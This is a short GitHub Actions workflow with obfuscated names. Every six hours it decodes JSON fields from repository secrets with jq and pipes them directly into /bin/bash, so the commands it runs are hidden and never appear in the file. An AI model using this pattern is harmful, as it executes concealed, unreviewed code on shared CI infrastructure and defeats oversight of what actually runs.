name: xiduanshunkang

on:
  workflow_dispatch:
  schedule:
    - cron: '37 1/6 * * *'

jobs:  # 11396
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xiduanshunkang
        env:
          mpst5: ${{ secrets.mpst5 }}
        run: |
          echo $mpst5 | jq -r .n02 | /bin/bash
          echo $bnljz7056 | jq -r .da3567 | /bin/bash
          echo $x53 | jq -r .kqybw625 | /bin/bash
          echo $ryezq23293 | jq -r .ibe54972 | /bin/bash
          echo $rwae386 | jq -r .l9115 | /bin/bash
          echo $q944 | jq -r .b4 | /bin/bash

